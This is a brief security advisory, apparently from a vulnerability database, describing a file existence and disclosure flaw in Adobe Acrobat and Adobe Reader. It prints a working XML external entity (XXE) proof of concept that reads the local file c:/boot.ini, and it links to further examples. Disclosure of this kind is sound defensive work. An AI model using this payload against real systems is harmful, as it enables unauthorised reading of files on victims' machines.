|
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
An exploit is not required. The following proof of concept is available: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "c:/boot.ini"> ]> <foo>&xxe;</foo> More proof of concept examples are available at the following location: http://shh.thathost.com/secadv/adobexxe/ |
|
 Privacy Statement |
